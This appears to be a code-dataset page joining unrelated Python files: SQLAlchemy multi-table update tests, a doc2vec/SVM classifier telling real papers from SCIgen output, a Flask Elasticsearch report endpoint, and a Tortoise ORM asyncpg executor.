(2, 8, "ad_ed2", "ed@wood.com"),
(3, 8, "ad_ed2", "ed@bettyboop.com"),
(4, 8, "ad_ed2", "ed@lala.com"),
(5, 9, "x", "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
expected = [(7, "jack"), (8, "ed2"), (9, "fred"), (10, "chuck")]
self._assert_users(users, expected)
def _assert_addresses(self, addresses, expected):
stmt = addresses.select().order_by(addresses.c.id)
eq_(testing.db.execute(stmt).fetchall(), expected)
def _assert_users(self, users, expected):
stmt = users.select().order_by(users.c.id)
eq_(testing.db.execute(stmt).fetchall(), expected)
class UpdateFromMultiTableUpdateDefaultsTest(
_UpdateFromTestBase, fixtures.TablesTest
):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("name", String(30), nullable=False),
Column("some_update", String(30), onupdate="im the update"),
)
Table(
"addresses",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("user_id", None, ForeignKey("users.id")),
Column("email_address", String(50), nullable=False),
)
Table(
"foobar",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("user_id", None, ForeignKey("users.id")),
Column("data", String(30)),
Column("some_update", String(30), onupdate="im the other update"),
)
@classmethod
def fixtures(cls):
return dict(
users=(
("id", "name", "some_update"),
(8, "ed", "value"),
(9, "fred", "value"),
),
addresses=(
("id", "user_id", "email_address"),
(2, 8, "ed@wood.com"),
(3, 8, "ed@bettyboop.com"),
(4, 9, "fred@fred.com"),
),
foobar=(
("id", "user_id", "data"),
(2, 8, "d1"),
(3, 8, "d2"),
(4, 9, "d3"),
),
)
@testing.only_on("mysql", "Multi table update")
def test_defaults_second_table(self):
users, addresses = self.tables.users, self.tables.addresses
values = {addresses.c.email_address: "updated", users.c.name: "ed2"}
ret = testing.db.execute(
addresses.update()
.values(values)
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
)
eq_(set(ret.prefetch_cols()), set([users.c.some_update]))
expected = [
(2, 8, "updated"),
(3, 8, "updated"),
(4, 9, "fred@fred.com"),
]
self._assert_addresses(addresses, expected)
expected = [(8, "ed2", "im the update"), (9, "fred", "value")]
self._assert_users(users, expected)
@testing.only_on("mysql", "Multi table update")
def test_defaults_second_table_same_name(self):
users, foobar = self.tables.users, self.tables.foobar
values = {foobar.c.data: foobar.c.data + "a", users.c.name: "ed2"}
ret = testing.db.execute(
users.update()
.values(values)
.where(users.c.id == foobar.c.user_id)
.where(users.c.name == "ed")
)
eq_(
set(ret.prefetch_cols()),
set([users.c.some_update, foobar.c.some_update]),
)
expected = [
(2, 8, "d1a", "im the other update"),
(3, 8, "d2a", "im the other update"),
(4, 9, "d3", None),
]
self._assert_foobar(foobar, expected)
expected = [(8, "ed2", "im the update"), (9, "fred", "value")]
self._assert_users(users, expected)
@testing.only_on("mysql", "Multi table update")
def test_no_defaults_second_table(self):
users, addresses = self.tables.users, self.tables.addresses
ret = testing.db.execute(
addresses.update()
.values({"email_address": users.c.name})
.where(users.c.id == addresses.c.user_id)
.where(users.c.name == "ed")
)
eq_(ret.prefetch_cols(), [])
expected = [(2, 8, "ed"), (3, 8, "ed"), (4, 9, "fred@fred.com")]
self._assert_addresses(addresses, expected)
# users table not actually updated, so no onupdate
expected = [(8, "ed", "value"), (9, "fred", "value")]
self._assert_users(users, expected)
def _assert_foobar(self, foobar, expected):
stmt = foobar.select().order_by(foobar.c.id)
eq_(testing.db.execute(stmt).fetchall(), expected)
def _assert_addresses(self, addresses, expected):
stmt = addresses.select().order_by(addresses.c.id)
eq_(testing.db.execute(stmt).fetchall(), expected)
def _assert_users(self, users, expected):
stmt = users.select().order_by(users.c.id)
eq_(testing.db.execute(stmt).fetchall(), expected)
|
#doc2vector
import csv
import pandas as pd
import numpy as np
from sklearn import svm
from sklearn.feature_extraction import text
from sklearn.cross_validation import train_test_split
from sklearn import metrics
from sklearn.metrics import roc_curve,auc,f1_score
import matplotlib.pyplot as plt
from gensim.models import doc2vec
from gensim import corpora
from gensim.parsing.preprocessing import strip_numeric
from gensim.parsing.preprocessing import remove_stopwords
from gensim.parsing.preprocessing import strip_short
from gensim.parsing.preprocessing import strip_non_alphanum
stop_words = text.ENGLISH_STOP_WORDS.union([u'apr',u'archetypr',u'aug',u'configuration',u'conference',u'continuing'])#estimate
sci_file = "cs_papers/sci_after_filter.csv"
scigen_file = "cs_papers/scigen_after_filter.csv"
#import csv, build label
#label: a=1,b=0
def import_data(a_file,a_row,b_file,b_row):
a_content = []
a_content_1 = open(a_file, 'r')
csv_reader_a = csv.reader(a_content_1)
for row in csv_reader_a:
row_new = remove_stopwords(row[a_row])
row_new = strip_numeric(row_new)
row_new = strip_non_alphanum(row_new)
row_new = strip_short(row_new,minsize = 3)
a_content.append(row_new)
a_length = len(a_content)
a_label = np.ones(a_length)
a_label = a_label.tolist()
b_content = []
b_content_1 = open(b_file, 'r')
csv_reader_b = csv.reader(b_content_1)
for row in csv_reader_b:
row_new = remove_stopwords(row[a_row])
row_new = strip_numeric(row_new)
row_new = strip_non_alphanum(row_new)
row_new = strip_short(row_new,minsize = 3)
b_content.append(row_new)
b_length = len(b_content)
b_label = np.zeros(b_length)
b_label = b_label.tolist()
return a_content, a_label, b_content, b_label
sci_content, sci_label,scigen_content, scigen_label = import_data(sci_file,1,scigen_file,1)
len1=len(sci_content)
len2=len(scigen_content)
data = sci_content+scigen_content
label = sci_label+scigen_label
def build_dict(data,stop_words):
texts = [[word for word in document.lower().split() if word not in stop_words]
for document in data]
dictionary = corpora.Dictionary(texts)
return texts,dictionary
content, dict = build_dict(data,stop_words)
def labelizeReviews(reviews):
labelized = []
for i,v in enumerate(reviews):
label = '%s'%(i)
labelized.append(doc2vec.LabeledSentence(v, [label]))
return labelized
content1 = labelizeReviews(content)
model = doc2vec.Doc2Vec(content1,min_count=1,window=5,size=200)
model.save("doc_auto_human_passage.model")
def getVecs(model, corpus, size):
vecs = [np.array(model.docvecs[z.tags[0]]).reshape((1, size)) for z in corpus]
return np.concatenate(vecs)
def f1(content, label, cross_fold):
f1_mean = 0
for i in range(0,cross_fold):
print i
content_auto = content[0:928]
content_human = content[928:1836]
label_auto = label[0:928]
label_human = label[928:1836]
random_num = np.random.randint(low=0, high=100)
content_train_auto,content_test_auto,label_train_auto,label_test_auto = train_test_split(content_auto, label_auto, test_size=0.2,random_state=random_num)
random_num = np.random.randint(low=0, high=100)
content_train_human,content_test_human,label_train_human,label_test_human = train_test_split(content_human, label_human, test_size=0.2,random_state=random_num)
content_train = content_train_auto+content_train_human
content_test = content_test_auto+content_test_human
label_train = label_train_auto+label_train_human
label_test = label_test_auto+label_test_human
#build matrics
d2v_model = doc2vec.Doc2Vec.load("doc_auto_human_passage.model")
#print "model load successed"
train = getVecs(d2v_model, content_train, 200)
#print "train builed"
test = getVecs(d2v_model, content_test, 200)
#print "test build"
clf = svm.SVC(kernel='linear')
clf_res = clf.fit(train, label_train)
pred = clf_res.predict(test)
score_micro = f1_score(label_test, pred, average='micro')
score_macro = f1_score(label_test, pred, average='macro')
f1=(score_macro+score_micro)/2
print 'f1: %0.20f'%f1
f1_mean+=f1
f1_mean = f1_mean/cross_fold
print 'f1_mean: %0.20f'%f1_mean
f1(content1, label, 10)
|
from flask import Blueprint, request
from flask_jwt_extended import jwt_required
from utils.custom_exception import InvalidUsage
from utils.esconn import ESConn, GroupByParams
from utils.response import set_response
from utils.constants import ES_TERMS_AGGR_SIZE, REPORT_INDEX, TIME_UNIT_MAPPING
reports_api = Blueprint("reports_api", __name__)
@reports_api.route('/detailed_report_status', methods=['GET'], endpoint="api_v1_5_get_detailed_report_api_status")
@jwt_required()
def get_detailed_report_api_status():
param = GroupByParams(REPORT_INDEX)
param.add_agg_field_generic('report_id.keyword', 'terms', "status", size=ES_TERMS_AGGR_SIZE)
param.add_agg_field_generic('', 'top_hits', 'document', size=1, sort=[{"@timestamp": {"order": "desc"}}])
es_response = ESConn.group_by(param, None)
data = []
for ele in es_response['status']['buckets']:
for info in ele['document']['hits']['hits']:
data.append(info['_source'])
data = sorted(data, key=lambda k: k["@timestamp"], reverse=True)
return set_response(data=data)
|
import uuid
from typing import Optional, Sequence
import asyncpg
from pypika import Parameter
from pypika.terms import Term
from tortoise import Model
from tortoise.backends.base.executor import BaseExecutor
from tortoise.contrib.postgres.json_functions import (
postgres_json_contained_by,
postgres_json_contains,
postgres_json_filter,
)
from tortoise.contrib.postgres.search import SearchCriterion
from tortoise.filters import json_contained_by, json_contains, json_filter, search
def postgres_search(field: Term, value: Term):
return SearchCriterion(field, expr=value)
class AsyncpgExecutor(BaseExecutor):
EXPLAIN_PREFIX = "EXPLAIN (FORMAT JSON, VERBOSE)"
DB_NATIVE = BaseExecutor.DB_NATIVE | {bool, uuid.UUID}
FILTER_FUNC_OVERRIDE = {
search: postgres_search,
json_contains: postgres_json_contains,
json_contained_by: postgres_json_contained_by,
json_filter: postgres_json_filter,
}
def parameter(self, pos: int) -> Parameter:
return Parameter("$%d" % (pos + 1,))
def _prepare_insert_statement(self, columns: Sequence[str], has_generated: bool = True) -> str:
query = (
self.db.query_class.into(self.model._meta.basetable)
.columns(*columns)
.insert(*[self.parameter(i) for i in range(len(columns))])
)
if has_generated:
generated_fields = self.model._meta.generated_db_fields
if generated_fields:
query = query.returning(*generated_fields)
return str(query)
async def _process_insert_result(
self, instance: Model, results: Optional[asyncpg.Record]
) -> None:
if results:
generated_fields = self.model._meta.generated_db_fields
db_projection = instance._meta.fields_db_projection_reverse
for key, val in zip(generated_fields, results):
setattr(instance, db_projection[key], val)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.